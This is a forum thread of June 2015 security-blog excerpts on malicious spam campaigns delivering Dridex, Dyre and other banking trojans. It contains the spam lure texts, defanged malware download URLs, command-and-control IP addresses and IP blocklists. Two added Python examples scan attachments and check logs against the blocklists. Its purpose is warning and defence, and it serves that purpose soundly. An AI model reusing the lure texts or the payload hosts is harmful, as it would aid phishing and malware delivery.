1 June 2015: Order confirmation 300-2015001469.doc - Current Virus total detections: 4/56* ... downloads the same Dridex banking Trojan as one of today’s earlier word based malspam runs Emailing: slide1 Date: Mon, 01 Jun 2015 14:36:47 +0200 – Simon Harrington – word doc or excel xls spreadsheet malware**. The single version I examined downloaded from http ://irpanet .com/1/09.exe but there are -multiple- download locations... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/772bf0a7dbfcca63ed11451870cadc7edd25f18754e80710b7440ba23a5cec15/analysis/1433170304/
** http://myonlinesecurity.co.uk/emailing-slide1-date-mon-01-jun-2015-143647-0200-simon-harrington-word-doc-or-excel-xls-spreadsheet-malware/
irpanet .com: 64.29.151.221: https://www.virustotal.com/en/ip-address/64.29.151.221/information/
:fear::fear: :mad:
AplusWebMaster
2015-06-02, 15:05
FYI...
DYRE Banking Malware Upsurge - Europe and North America Most Affected
- http://blog.trendmicro.com/trendlabs-security-intelligence/old-banking-malware-resurfaces-europe-north-america-most-affected/
June 2, 2015 - "Online banking users in Europe and North America are experiencing the upsurge of DYRE*, a malware family notorious for the multiple ways it steals data and its ties to parcel mule scams, among others. There has been a 125% increase of DYRE-related infections worldwide this quarter compared to the last, proving that cybercriminal interest in online banking has only continued to grow... We looked closely at the financial institutions whose URLs were contained in the DYRE malware samples. We noted URLs associated with several multinational banks, including their varied country branches, divisions, and the like... What’s troubling with this recent spam run is that it shows how online banking malware continue to come up with versions designed to defeat detection. UPATRE, the known precursor to DYRE, is part of the infection chain in this threat. Historically, UPATRE has been known to be the downloader or middleman malware of sorts for other infamous malware like ZBOT, CRILOCK, and ROVNIX. This time, UPATRE has grown beyond being just a downloader of other malware. Its new variant can -disable- detection, thus making it easier for the download of DYRE or other malware into user systems. Specifically, its additional functions include the following:
- Disabling firewall/network related security by modifying some registry entries.
- Disabling firewall/network related security via stoppage of related services.
- Disabling Windows' default anti-malware feature (WinDef)
Recently, we have also seen a UPATRE variant (detected TROJ_UPATRE.HM) being dropped as a Microsoft Compiled HTML/ Help file (.CHM) on a spam run victimizing JPMorgan Chase & Co. customers. Looking at the content of the spam mail, we notice that it follows a typical social engineering ruse. It specifically tries to -scare- users into opening an attached .EXE file to find out about a non-existent law that supposedly doubles their tax. When it comes to tax, people can get worried enough to succumb to the scam. Seeing that most samples we have seen so far use the English language, it is likely that users of the DYRE malware have been sending out similar messages to a variety of regions, without specifically tweaking according to language and banking preferences... It pays to be prepared especially when consequences are literally DYRE. As we have previously advocated, banking malware that spread via -spammed- mails can be fought off by knowing your banking policies, downloading a full-featured antimalware solution, immediately changing passwords and monitoring online banking transactions in case of infections, and alerting the bank when you spot suspicious transactions..."
* http://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-dyre-malware-part-1/
___
Fake 'Rental Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/june-2015-rental-invoice-alex-batts-bbsp-co-uk-word-doc-or-excel-xls-spreadsheet-malware/
2 Jun 2015 - "'June 2015 Rental Invoice' pretending to come from Alex Batts <abatts@ bbsp .co .uk> is being delivered mangled and malformed. It is supposed to come with a malicious word doc or Excel XLS spreadsheet attachment but that is being embedded as a base 64 encoded set of text in the mangled body of the email, rather than being attached. Most users should be protected from this malware, but be aware that some mail servers will automatically fix this sort of garbled corruption and deliver the email as a warning email with a zip of the extracted content. Do-not-click on or open the word doc inside the zip... The email which comes in -garbled- looks like:
[Garbled text...]
Hi
Please find attached the Rental Invoice for June 2015 – which is due for pa=
yment on or before 10st June.
Have a lovely afternoon.
Kind regards
Alex Batts
Forum Receptionist
Telephone : 0117 370 7700
Mobile : 0750 083 5323 ...
[More garbled text...]
2 June 2015: June 2015 Rental Invoice – Inv 103756.doc - Current Virus total detections: 1/56* | 2/57**
The second -malicious- macro downloads http ://amagumori.3dfxwave .com/7/8.exe which is a Dridex banking malware (VirusTotal***). The first will also download the same malware but from a different location... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/e92d81e7876bed8b073b7a4639945d90b557361c24334fbd85f3cb26c42a356c/analysis/1433243825/
** https://www.virustotal.com/en/file/084bcfb1286179fbfccd09397886ff8cabfe525bb755ded49ca126e7fc69ccd2/analysis/1433250642/
*** https://www.virustotal.com/en/file/ddbe5dc2d78179d593285c11930d4fe08bddb222a10c364a35bef362443f315c/analysis/1433248974/
... Behavioural information
TCP connections
31.186.99.250: https://www.virustotal.com/en/ip-address/31.186.99.250/information/
5.178.43.49: https://www.virustotal.com/en/ip-address/5.178.43.49/information/
amagumori.3dfxwave .com: 202.129.207.121: https://www.virustotal.com/en/ip-address/202.129.207.121/information/
___
Fake 'Invoice ID' SPAM - malware attachment
- http://blog.mxlab.eu/2015/06/02/email-invoice-id-contains-trojan/
June 2, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “Invoice ID”. This email is sent from a -spoofed- address and has the following short body:
INVOICE
Invoice ID: 6568469164
Store id: 9135
The attached file 6568469164_9135.zip contains the 156 kB large file invoice_company.exe. The trojan is known as PE:Malware.Obscure!1.9C59 or Trojan.Win32.Qudamah.Gen.24. At the time of writing, 2 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/d09c434a93f4b124a54e84a39c31237bf2b6bce09545e777c7ddb8a55e9afec0/analysis/1433259213/
... Behavioural information
TCP connections
104.238.136.31: https://www.virustotal.com/en/ip-address/104.238.136.31/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/188.120.194.101/information/
173.243.255.79: https://www.virustotal.com/en/ip-address/173.243.255.79/information/
90.84.60.99: https://www.virustotal.com/en/ip-address/90.84.60.99/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/188.120.194.101/information/
___
2015 Malvertising infected millions of users
- http://net-security.org/malware_news.php?id=3049
June 2, 2015 - "New research from Malwarebytes has found that -malvertising- is one of the primary infection vectors used to reach millions of consumers this year. The analysis looked at the three large scale zero-day attacks affecting Flash Player*, and the results have been presented at Infosecurity Europe 2015:
> http://www.net-security.org/images/articles/zerodays-02062015.jpg
Analysis of one particular zero-day attack instigated using the HanJuan Exploit Kit showed that cybercriminals paid an average of 49p for every 1,000 infected adverts impressions on major websites at highly trafficked times of day. This amount could even drop as low as 4p per infected ad impression on lesser-known websites and during quieter times of day. Malicious adverts placed on popular websites including The Huffington Post, Answers.com and Daily Motion, which all boast monthly unique users in the millions, are responsible for exposing vast numbers of consumers to zero-day attacks. Even consumers and businesses running the -latest- versions of Internet Explorer, Firefox and Flash Player are susceptible to becoming immediately infected when exposed to this type of threat which makes it particularly lucrative for the criminal community. Further, with one zero-day remaining active for almost two months of the analysis period there is scope for exploits to have especially wide-reaching effects. The nefarious use of the online ad industry is facilitated by real-time bidding as this allows advertisers to bid in real-time for specific targets and weed out non-genuine users or those that should not be targeted by exploits... This is especially important with the kind of malware that is dropped by exploit kits, and in particular ransomware. Companies can literally be crippled by such malware, lose customers and in some cases put their business in jeopardy."
* https://www.malwarebytes.org/threezerodays/
"... new vulnerabilities are found and weaponized at a much faster rate. Combine this trend with the fact that rolling out patches requires time and testing for businesses and you see the issue: A window of opportunity to exploit systems emerges... While keeping systems up to date remains one of the most important pieces of advice against exploits, zero-days make it completely irrelevant... To face this new reality, businesses and consumers must adapt as well by adopting new tools to safeguard their assets..."
:fear::fear: :mad:
AplusWebMaster
2015-06-03, 15:42
FYI...
Fake 'your receipt' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/your-receipt-amy-morley-howard-cundey-word-doc-or-excel-xls-spreadsheet-malware/
3 Jun 2015 - "'your receipt' pretending to come from Amy Morley <amymorley@ howardcundey .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/06/Amy-Morley-your-receipt.png
3 June 2015: 20150414151213550.doc - Current Virus total detections: 3/57*
The malicious macro in this version connects to and downloads anthonymaddaloni .com/~web/5/0.exe which is a Dridex banking malware (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/1ceb4c29ecb3794d1ffb4d3f41265b0dd70f58b3eff1b21adbfdee688f72784b/analysis/1433318349/
** https://www.virustotal.com/en/file/52aead62b02ddb887572371a01135230fb281cb3655c5fb18dedbcd0505b5c4b/analysis/1433318155/
... Behavioural information
TCP connections
37.140.195.177: https://www.virustotal.com/en/ip-address/37.140.195.177/information/
5.178.43.34: https://www.virustotal.com/en/ip-address/5.178.43.34/information/
anthonymaddaloni .com: 69.72.240.66: https://www.virustotal.com/en/ip-address/69.72.240.66/information/
___
Myfax malspam wave - links to malware and Neutrino exploit kit
- https://isc.sans.edu/diary.html?storyid=19759
2015-06-03 - "... there have been more waves of malicious spam (malspam) spoofing myfax .com. On Tuesday 2015-06-02, the messages contained links to a zip archive of a Pony downloader. Tuesday's messages also had links pushing Neutrino exploit kit (EK). Spoofed myfax emails are nothing new. They've been around for years. This is yet another wave in the continuous onslaught of malspam that organizations face every day... I noticed similar messages last week, but they were all blocked. At that time, I wasn't able to investigate any further. On 2015-06-02, checking my employer's spam filters revealed spoofed myfax messages were coming in again after a 3 day break... Below is an example of the messages blocked by my organization's spam filters on 2015-06-02:
> https://isc.sans.edu/diaryimages/images/2015-06-03-ISC-Diary-image-03a.jpg
The above example shows 2 types of URLs. The first points to a zip file. The second points to URLs ending in fax.php that push Neutrino EK. Last week's malspam only had links to the zip files... In a lab environment, those links ending with fax.php returned HTML with iframes leading to Neutrino EK..."
(More detail at the isc URL above.)
___
Fake email “Fax to” contains trojan
- http://blog.mxlab.eu/2015/06/03/fake-email-fax-to-contains-trojan/
June 3, 2015 - "... intercepted a new trojan distribution campaign by email with the subject “Fax to”.
This email is sent from a -spoofed- address and has the following body:
Fax Massege:
Fax ID: 1500566473
User ID: 429286424
The attached file fax-1500566473_429286424.zip contains the 148 kB large file Document_invoice.exe.
The trojan is known as Downloader-FAVN!A43A201F788E, Trj/Genetic.gen, PE:Malware.Obscure!1.9C59 or Win32.Trojan.Fakedoc.Auto. At the time of writing, 4 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/ee8aa66263e0c8249903efd4ed467b4666a0e8c7347a52826f786da91d1f247b/analysis/1433353970/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en/ip-address/104.238.141.75/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/188.120.194.101/information/
92.38.41.38: https://www.virustotal.com/en/ip-address/92.38.41.38/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
:fear::fear: :mad:
AplusWebMaster
2015-06-04, 15:01
FYI...
Fake 'Scan' SPAM – PDF malware
- http://myonlinesecurity.co.uk/scan-number-3744444093-fake-pdf-malware/
4 June 2015 - "'Scan number: 3744444093' [all the numbers are random] coming from random names and random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Scan number: 3744444093
Pages: 54
4 June 2015: scan-3744444093_54.zip: Extracts to: Document_invoice.exe
Current Virus total detections: 0/58* | 1/57**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8412fca3ff777ae74ed357d592e3fda3e9575d09d1cf25c10f57844a9ac4d65f/analysis/1433413368/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en/ip-address/104.238.141.75/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
94.103.54.19: https://www.virustotal.com/en/ip-address/94.103.54.19/information/
5.178.43.35: https://www.virustotal.com/en/ip-address/5.178.43.35/information/
** https://www.virustotal.com/en/file/ad846141fd05910364c4c58f03dc365a272970325f50bb5f89c7b3eb141359b3/analysis/1433412921/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en/ip-address/104.238.141.75/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
185.47.89.249: https://www.virustotal.com/en/ip-address/185.47.89.249/information/
5.178.43.49: https://www.virustotal.com/en/ip-address/5.178.43.49/information/
188.120.194.101: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
___
Fake 'Internet Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/eclipse-internet-invoice-17987580ec-word-doc-or-excel-xls-spreadsheet-malware/
4 June 2015 - "'Eclipse Internet Invoice – 17987580EC' pretending to come from customer@ eclipse .net .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Customer,
Thank you for choosing to receive your invoice by email. Please find this attached.
If you would like to change any of your billing options, please log in to My Eclipse using your registration email and password, at www .eclipse .net.uk/billing. Alternatively, you can contact our Customer Service Team, Monday to Friday 9am – 5.30pm, on the telephone number...
Kind regards
Eclipse Internet
This email has been scanned for all viruses. Please consider the environment before printing this email. The content of this email and any attachment is private and may be privileged. If you are not the intended recipient, any use, disclosure, copying or forwarding of this email and/or its attachments is unauthorised. If you have received this email in error please notify the sender by email and delete this message and any attachments immediately. Nothing in this email shall bind the Company or any of its subsidiaries or businesses in any... [blah, blah, blah]
4 June 2015 : invoice_EC_17987580_20141013081054.doc - Current Virus total detections: 2/57*
... the macro connects to http ://empreinte .com.ar/42/91.exe which is a Dridex banking malware (virusTotal***)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/9622fc6ee7d05888805e7c69f0c60411b0e72e8d7b2ae67e368410e1103c126e/analysis/1433415353/
** https://www.virustotal.com/en/file/22529b0b108b1c4bc9e86f2183728ad3acae8b22da2138f0d7e3cf362d82fcd0/analysis/1433415107/
empreinte .com.ar: 200.68.105.31: https://www.virustotal.com/en/ip-address/200.68.105.31/information/
___
Dyre banking Trojan infections up 125%
- http://net-security.org/malware_news.php?id=3050
June 4, 2015 - "Cybercriminal interest in online banking continues to grow, and crooks wielding the Dyre/Dyreza banking Trojan continue spewing out spam emails delivering a new variant of the malware:
> http://www.net-security.org/images/articles/dyre-04062015.jpg
'There has been a 125% increase of Dyre-related infections worldwide this quarter compared to the last', Trend Micro researchers have noted*. 'Roughly 7 in 10 users infected during the last three months came from the European (39% of the total count) and North American (38%) regions. Asia Pacific came in third, with 19% of the infections.' In early May, there was a considerable spike in these spam emails targeting the APAC region. 'We looked closely at the financial institutions whose URLs were contained in the Dyre malware samples. We noted URLs associated with several multinational banks, including their varied country branches, divisions, and the like,' the researchers shared. As before, Dyre is -not- delivered directly via email. Instead, the malicious attachments hold the Upatre downloader, which then downloads Dyre. Upatre also got updated, and these newer versions have the ability to disable firewall/network related security by modifying some registry entries and via -stoppage- of related services, and to disable Windows' default anti-malware feature (Windows Defender). The emails delivering the malware try to -scare- users into opening the attached file by claiming that the recipients' tax payments have doubled. So far, they have been mostly in English, but Trend Micro expects more regionalized messages in the future, as the attackers are looking to expand globally."
* http://blog.trendmicro.com/trendlabs-security-intelligence/old-banking-malware-resurfaces-europe-north-america-most-affected/
:fear::fear: :mad:
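Added example, not code from myonlinesecurity.co.uk or any other source quoted in this thread: a Python check that classifies mail attachments by their leading bytes rather than by file name or icon, opens zip wrappers to reach the `Document_invoice.exe`-style executables from the 'Scan' run above, and decodes base64 left inline in the body as in the mangled 'Rental Invoice' run. The message, addresses, file names and stub bytes are constructed sample data.

```python
"""Classify mail attachments by content, not by name or icon (added example)."""
import base64
import io
import os
import re
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage

# File signatures the runs above keep producing: a PE dressed up with a PDF icon,
# OLE2 Word/Excel documents carrying macros, zip wrappers, and genuine PDFs.
MAGIC = [
    (b"MZ", "pe-executable"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2-office"),
    (b"PK\x03\x04", "zip"),
    (b"%PDF", "pdf"),
]
# What a file with this extension should actually contain.
EXPECTED = {".pdf": {"pdf"}, ".doc": {"ole2-office"}, ".xls": {"ole2-office"},
            ".zip": {"zip"}}
# Base64 as mailers emit it: 76-column wrapped lines, or one long unbroken run.
B64_RUN = re.compile(
    rb"(?:(?:[A-Za-z0-9+/]{76}\r?\n){2,}[A-Za-z0-9+/]{0,75}|[A-Za-z0-9+/]{200,})={0,2}")


def classify(data: bytes) -> str:
    """Content label from the leading bytes; the file name plays no part."""
    for sig, label in MAGIC:
        if data.startswith(sig):
            return label
    return "unknown"


def assess(name: str, data: bytes) -> tuple:
    """(name, content label, verdict). A PE is flagged whatever it is called."""
    kind = classify(data)
    ext = os.path.splitext(name.lower())[1]
    if kind == "pe-executable":
        return (name, kind, "executable")
    if ext in EXPECTED and kind not in EXPECTED[ext]:
        return (name, kind, "extension-mismatch")
    return (name, kind, "ok")


def scan_blob(name: str, data: bytes, depth: int = 0) -> list:
    """Assess a blob; zip archives are opened (two levels deep) and each member assessed."""
    if classify(data) == "zip" and depth < 2:
        out = []
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if not info.is_dir():
                    out.extend(scan_blob(f"{name}/{info.filename}", zf.read(info), depth + 1))
        return out
    return [assess(name, data)]


def scan_message(raw: bytes) -> list:
    """Findings for every MIME attachment plus any base64 blob left inline in a text part."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        findings.extend(scan_blob(part.get_filename() or "(unnamed)",
                                  part.get_payload(decode=True) or b""))
    # A mangled message carries its attachment as raw base64 text in the body
    # (the 'Rental Invoice' run); decode such runs and assess them the same way.
    for part in msg.walk():
        if part.get_content_maintype() != "text" or part.is_attachment():
            continue
        body = part.get_payload(decode=True) or b""
        for n, m in enumerate(B64_RUN.finditer(body)):
            cleaned = re.sub(rb"\s", b"", m.group(0))
            try:
                blob = base64.b64decode(cleaned, validate=True)
            except ValueError:  # binascii.Error is a ValueError: not real base64
                continue
            for name, kind, verdict in scan_blob(f"(inline base64 #{n})", blob):
                if verdict == "ok" and kind != "unknown":
                    verdict = "file-hidden-in-body"
                findings.append((name, kind, verdict))
    return findings


def build_sample() -> bytes:
    """Constructed message in the shape of the runs above; every name and byte is made up."""
    fake_pe = b"MZ" + b"\x00" * 62           # only the DOS header magic, not a program
    fake_ole = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 192
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:     # zip that extracts to a PDF-iconed .exe
        zf.writestr("Document_invoice.exe", fake_pe)
    msg = EmailMessage()
    msg["Subject"] = "Scan number: 3744444093"
    msg["From"] = "scanner@example.invalid"
    msg["To"] = "accounts@example.invalid"
    msg.set_content("Scan number: 3744444093\nPages: 54\n\nPlease find the invoice attached.\n\n"
                    + base64.encodebytes(fake_ole).decode("ascii")   # the 'mangled' blob
                    + "\nKind regards\nAccounts\n")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="scan-3744444093_54.zip")
    msg.add_attachment(b"%PDF-1.4\n%constructed stub\n", maintype="application",
                       subtype="pdf", filename="Bank payment 100615.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, kind, verdict in scan_message(build_sample()):
        print(f"{verdict:20} {kind:14} {name}")
```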
AplusWebMaster
2015-06-05, 14:09
FYI...
Fake 'PPL invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/your-ppl-invoice-is-attached-word-doc-or-excel-xls-spreadsheet-malware/
5 June 2015 - "'Your PPL invoice is attached' pretending to come from no-reply@ PPLUK .COM with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Customer,
Please find attached your PPL invoice for your licence to use recorded music (whether via CDs, Radio/TV broadcasts, background music systems or other sources) at your premises.
Permission to use PPL repertoire under the terms of the licence will only be effective once payment has been made. Payment of your invoice can be made online at ppluk.com/payonline or you can call us on 020 7534 1070 to pay by credit or debit card. All payment methods can be found on the back of your invoice.
This is an automated email. If you have any queries about the invoice or requirements for a PPL licence, please refer to the contact information below.
Yours faithfully,
PPL Customer Services
PPL
1 Upper James Street London W1F 9DE
T +44 (0)20 7534 1070 ...
5 June 2015 : P_PP_INVN_02573466_01-43-52_03657322_NEWBUS_O_E.DOC
Current Virus total detections: 3/57*. The malicious macro in this version downloads Dridex banking malware from http ://g6000424 .ferozo .com/25/10.exe (VirusTotal**). Other download locations downloading the same Dridex banking malware that I have been informed about are:
http ://zolghadri-co .com/25/10.exe
http ://elkettasandassociates .com/25/10.exe
http ://segurosdenotebooks .com.br/25/10.exe
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/48548e5ec35a700110d5c01b74c483aa57bb2833d2ac4d756011240833e2bbff/analysis/1433498590/
** https://www.virustotal.com/en/file/4e25fd5596c14b3e9e8f3df6077e4f2cc47132ff43890e98cec9c80c56328f1a/analysis/1433496324/
... Behavioural information
TCP connections
203.151.94.120: https://www.virustotal.com/en/ip-address/203.151.94.120/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
___
Fake 'General Election 2015 Invoices' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/general-election-2015-invoices-sims-sales-ledger-st-ives-management-services-word-doc-or-excel-xls-spreadsheet-malware/
5 June 2015 - "'General Election 2015 Invoices' pretending to come from SIMSSL@ st-ives .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Dear Sir/Madam
Please find attached your invoice 62812 for GE2015
Please could payment be quoted with your constituency name/Invoice numbers
Our Bank Details are:
St Ives Management Services Limited
HSBC
Sort Code: 40-04-24
Account Number: 71419501
Account Name: St Ives Management Services Limited
Remittance advices should be emailed to simsAR@ st-ives .co.uk
If paying by cheque, please kindly remit to the address below and not to 1 Tudor Street:
St Ives Management Services Limited
c/o Branded3
2nd Floor, 2180 Century Way
Thorpe Park
Leeds
LS 8ZB
If you have already paid by credit card then there is no need for you to make payment again.
For payment queries please contact Steven Wilde 0113 306 6966
For invoice queries please contact Emily Villiers 0207 902 6449
Kind Regards
SIMS Sales Ledger...
5 June 2015 : 1445942147T0.doc ... which is -exactly- the same malware as described in 'Your PPL invoice is attached – word doc or excel xls spreadsheet malware'*
* http://myonlinesecurity.co.uk/your-ppl-invoice-is-attached-word-doc-or-excel-xls-spreadsheet-malware/
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
- http://blog.dynamoo.com/2015/06/malware-spam-general-election-2015.html
5 June 2015
"... Recommended blocklist:
203.151.94.120
31.186.99.250
146.185.128.226
185.12.95.40 "
:fear::fear: :mad:
AplusWebMaster
2015-06-08, 13:20
FYI...
Fake 'Bank payment' SPAM – PDF malware
- http://myonlinesecurity.co.uk/bank-payment-hairandhealth-co-uk-pdf-malware/
8 June 2015 - "'Bank payment' pretending to come from sarah@ hairandhealth .co.uk with a pdf attachment is another one from the current bot runs... This email contains a genuine PDF which has embedded scripts that will infect you. So far none of the automatic analysis tools can find any malicious content but it is trying to send multicast messages...
Update: An automatic analysis by Payload security* gives the download location as hundeschulegoerg .de/15/10.exe ( VirusTotal**)... Adobe reader in -recent- versions has Protected view automatically -enabled- and unless you press-the-button to 'enable all features', you should be safe from this attack... make sure you -uncheck- -any- additional offerings of security scans/Google chrome or -toolbars- that it wants to include in the download:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/doc4-1024x423.png
The email (which has random amounts) looks like:
Dear client
Please find attached a bank payment for £3033.10 dated 10th June 2015
to pay invoice 1757. With thanks.
Kind regards
Sarah
Accounts
Today's Date: Bank payment 100615.pdf - Current Virus total detections: 2/57***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.hybrid-analysis.com/sample/80410f74dca5ffae069fa4a07c368e749f351ffe385432ab816b64024697a06e?environmentId=2
** https://www.virustotal.com/en-gb/file/01d5203ee1b17ca0ea488853647bce5b9440bce941a5e840fcda804631c01f40/analysis/1433753588/
... Behavioural information
TCP connections
146.185.128.226: https://www.virustotal.com/en-gb/ip-address/146.185.128.226/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
*** https://www.virustotal.com/en-gb/file/80410f74dca5ffae069fa4a07c368e749f351ffe385432ab816b64024697a06e/analysis/1433751824/
hundeschulegoerg .de: 212.40.179.111: https://www.virustotal.com/en-gb/ip-address/212.40.179.111/information/
- http://blog.dynamoo.com/2015/06/malware-spam-bank-payment.html
8 June 2015
"... Recommended blocklist:
146.185.128.226
31.186.99.250
176.99.6.10
203.151.94.120
185.12.95.40 "
:fear::fear: :mad:
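The "Recommended blocklist" entries quoted in these posts are only useful if they get checked against something. The following is an added example (not code from dynamoo.com or myonlinesecurity.co.uk) that loads the two blocklists posted above in the loose one-IP-per-line form they appear in, then scans firewall and proxy log lines for connections to those addresses. The log lines are constructed for the example; only the blocklisted IPs come from the posts.

```python
"""Check the quoted 'Recommended blocklist' IPs against proxy/firewall log lines.

Added example; the blocklist IPs are the ones quoted above, the log lines are constructed.
"""
import ipaddress
import re
from collections import Counter
from typing import Dict, List, Set, Tuple

# The two blocklists quoted above (dynamoo.com, 5 and 8 June 2015), as posted:
# one IP per line, duplicates between runs, comments allowed.
BLOCKLIST_TEXT = """
# 5 June 2015 - Fake 'General Election 2015 Invoices'
203.151.94.120
31.186.99.250
146.185.128.226
185.12.95.40
# 8 June 2015 - Fake 'Bank payment'
146.185.128.226
31.186.99.250
176.99.6.10
203.151.94.120
185.12.95.40
"""

# Constructed sample log: three squid-style proxy lines and one iptables-style line.
# Hosts 10.0.0.x and the example.org traffic are made up; only the two blocklisted
# destinations are taken from the posts.
SAMPLE_LOG = """\
1433753588.123 10.0.0.15 TCP_MISS/200 3200 GET http://www.example.org/index.html - DIRECT/93.184.216.34 text/html
1433753601.456 10.0.0.15 TCP_MISS/200 812 POST http://146.185.128.226:8080/ - DIRECT/146.185.128.226 text/html
1433753602.789 10.0.0.22 TCP_MISS/304 210 GET http://www.example.org/style.css - DIRECT/93.184.216.34 text/css
Jun  8 10:15:02 fw01 kernel: OUTBOUND SRC=10.0.0.15 DST=31.186.99.250 PROTO=TCP SPT=51234 DPT=443
"""

# Dotted quad not glued to other digits/dots, so timestamps like 1433753588.123 are skipped.
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def parse_blocklist(text: str) -> Set[ipaddress.IPv4Address]:
    """Return the unique, syntactically valid IPv4 addresses in a posted blocklist."""
    ips: Set[ipaddress.IPv4Address] = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        try:
            ips.add(ipaddress.IPv4Address(line))
        except ipaddress.AddressValueError:
            continue  # a malformed entry should not abort loading the rest
    return ips


def find_hits(log_text: str, blocklist: Set[ipaddress.IPv4Address]) -> List[Tuple[int, str, str]]:
    """Return (line_number, matched_ip, raw_line) for each log line touching a blocklisted IP.

    Private (RFC 1918) addresses are skipped so an internal source host is never a 'match'.
    """
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for raw in IPV4_RE.findall(line):
            try:
                ip = ipaddress.IPv4Address(raw)
            except ipaddress.AddressValueError:
                continue
            if ip.is_private or ip not in blocklist:
                continue
            hits.append((lineno, str(ip), line))
            break  # one hit per line is enough for triage
    return hits


def summarize(hits: List[Tuple[int, str, str]]) -> Dict[str, int]:
    """Count hits per blocklisted IP, the figure you would hand to whoever owns the firewall."""
    return Counter(ip for _, ip, _ in hits)


if __name__ == "__main__":
    blocklist = parse_blocklist(BLOCKLIST_TEXT)
    for lineno, ip, line in find_hits(SAMPLE_LOG, blocklist):
        print(f"line {lineno}: {ip}: {line}")
    print(dict(summarize(find_hits(SAMPLE_LOG, blocklist))))
```

On the constructed log this reports the POST to 146.185.128.226 and the firewall line to 31.186.99.250, and nothing for the internal hosts or example.org; the parser deliberately tolerates the duplicates and comments that accumulate when several posted blocklists are pasted into one file.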
AplusWebMaster
2015-06-09, 13:22
FYI...
Fake 'Invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-invoice-fake-pdf-malware/
9 June 2015 - "'Re: Invoice' coming from random senders and random email addresses with a semi-random zip attachment (the zip is always called 'invoice(random number).zip') is another one from the current bot runs... other emails today pretending to come from RBC Express <ISVAdmin@ rbc .com> with a subject of 'invoices', along with a 'Lloyds Bank – Pendeford Securities – Please Read Action Required/PI Documents/ Region code East 2/ 4084583/'. These 2 have a different malware payload (VirusTotal*)... The email looks like:
Check Invoice number
9 June 2015: Invoice (42).zip: Extracts to: Invoice_store.exe - Current Virus total detections: 2/57**
This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/60a37e23969a4e90a8e2b64b8c15569173dead0479048e25fa3eb996a4e1b201/analysis/1433843143/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en-gb/ip-address/64.182.208.183/information/
188.120.194.101: https://www.virustotal.com/en-gb/ip-address/188.120.194.101/information/
216.254.231.11: https://www.virustotal.com/en-gb/ip-address/216.254.231.11/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
** https://www.virustotal.com/en-gb/file/6d645abb12fe3631a2134f29183f1010c80163201b5f475c212cdbeb4ecce49c/analysis/1433843556/
___
Fake 'Password Confirmation' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/password-confirmation-742263403307-t82-word-doc-or-excel-xls-spreadsheet-malware/
